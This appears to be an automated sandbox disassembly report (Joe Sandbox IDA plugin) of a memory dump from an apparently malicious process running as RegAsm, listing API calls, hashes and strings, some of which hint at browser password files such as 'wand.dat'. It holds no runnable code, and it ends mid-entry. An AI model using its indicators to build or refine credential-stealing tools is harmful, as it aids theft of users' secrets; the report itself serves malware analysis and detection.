                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpywcslen$_snwprintfmemset
                      • String ID: %s (%s)$YV@
                      • API String ID: 3979103747-598926743
                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                      APIs
                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMessageProc
                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                      • API String ID: 2780580303-317687271
                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                      APIs
                      Strings
                      • cannot ATTACH database within transaction, xrefs: 0042F663
                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                      • database is already attached, xrefs: 0042F721
                      • too many attached databases - max %d, xrefs: 0042F64D
                      • unable to open database: %s, xrefs: 0042F84E
                      • database %s is already in use, xrefs: 0042F6C5
                      • out of memory, xrefs: 0042F865
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                      • API String ID: 1297977491-2001300268
                      • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                      • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                      • wcslen.MSVCRT ref: 0040D1D3
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                      • String ID: strings
                      • API String ID: 3166385802-3030018805
                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                      APIs
                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                      • memset.MSVCRT ref: 00405455
                      • memset.MSVCRT ref: 0040546C
                      • memset.MSVCRT ref: 00405483
                      • memcpy.MSVCRT ref: 00405498
                      • memcpy.MSVCRT ref: 004054AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$memcpy$ErrorLast
                      • String ID: 6$\
                      • API String ID: 404372293-1284684873
                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                      APIs
                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                      • GetLastError.KERNEL32 ref: 0041855C
                      • Sleep.KERNEL32(00000064), ref: 00418571
                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                      • GetLastError.KERNEL32 ref: 0041858E
                      • Sleep.KERNEL32(00000064), ref: 004185A3
                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AttributesErrorFileLastSleep$??3@
                      • String ID:
                      • API String ID: 1040972850-0
                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                      APIs
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                      • wcscpy.MSVCRT ref: 0040A0D9
                      • wcscat.MSVCRT ref: 0040A0E6
                      • wcscat.MSVCRT ref: 0040A0F5
                      • wcscpy.MSVCRT ref: 0040A107
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                      • String ID:
                      • API String ID: 1331804452-0
                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                      APIs
                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                      • String ID: advapi32.dll
                      • API String ID: 2012295524-4050573280
                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                      APIs
                      Strings
                      • <?xml version="1.0" ?>, xrefs: 0041007C
                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                      • <%s>, xrefs: 004100A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$_snwprintf
                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                      • API String ID: 3473751417-2880344631
                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: wcscat$_snwprintfmemset
                      • String ID: %2.2X
                      • API String ID: 2521778956-791839006
                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _snwprintfwcscpy
                      • String ID: dialog_%d$general$menu_%d$strings
                      • API String ID: 999028693-502967061
                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                      APIs
                      • memset.MSVCRT ref: 004185FC
                      • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@AttributesFilememset
                      • String ID:
                      • API String ID: 776155459-0
                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                      • malloc.MSVCRT ref: 00417524
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                      • String ID:
                      • API String ID: 2308052813-0
                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                      APIs
                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: PathTemp$??3@
                      • String ID: %s\etilqs_$etilqs_
                      • API String ID: 1589464350-1420421710
                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                      APIs
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                        • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                      • memset.MSVCRT ref: 0040C439
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      • memset.MSVCRT ref: 0040C4D0
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@$EnumValuememset$Open_wcsuprmemcpywcslen
                      • String ID:
                      • API String ID: 3312893244-0
                      • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                      • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 00417497
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                      • malloc.MSVCRT ref: 004174BD
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                      • String ID:
                      • API String ID: 2903831945-0
                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                      APIs
                      • GetParent.USER32(?), ref: 0040D453
                      • GetWindowRect.USER32(?,?), ref: 0040D460
                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Window$Rect$ClientParentPoints
                      • String ID:
                      • API String ID: 4247780290-0
                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                      • memset.MSVCRT ref: 004450CD
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                      • String ID:
                      • API String ID: 1471605966-0
                      • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                      • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpy$??3@
                      • String ID: g4@
                      • API String ID: 3314356048-2133833424
                      • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                      • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                      APIs
                      • memset.MSVCRT ref: 004100FB
                      • memset.MSVCRT ref: 00410112
                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                      • _snwprintf.MSVCRT ref: 00410141
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$_snwprintf_wcslwrwcscpy
                      • String ID: </%s>
                      • API String ID: 3400436232-259020660
                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                      APIs
                      • memset.MSVCRT ref: 0040D58D
                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ChildEnumTextWindowWindowsmemset
                      • String ID: caption
                      • API String ID: 1523050162-4135340389
                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                      APIs
                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                      • String ID: MS Sans Serif
                      • API String ID: 210187428-168460110
                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                      APIs
                      • memset.MSVCRT ref: 0040560C
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                      • String ID: *.*$dat$wand.dat
                      • API String ID: 2618321458-1828844352
                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                      APIs
                      • memset.MSVCRT ref: 00412057
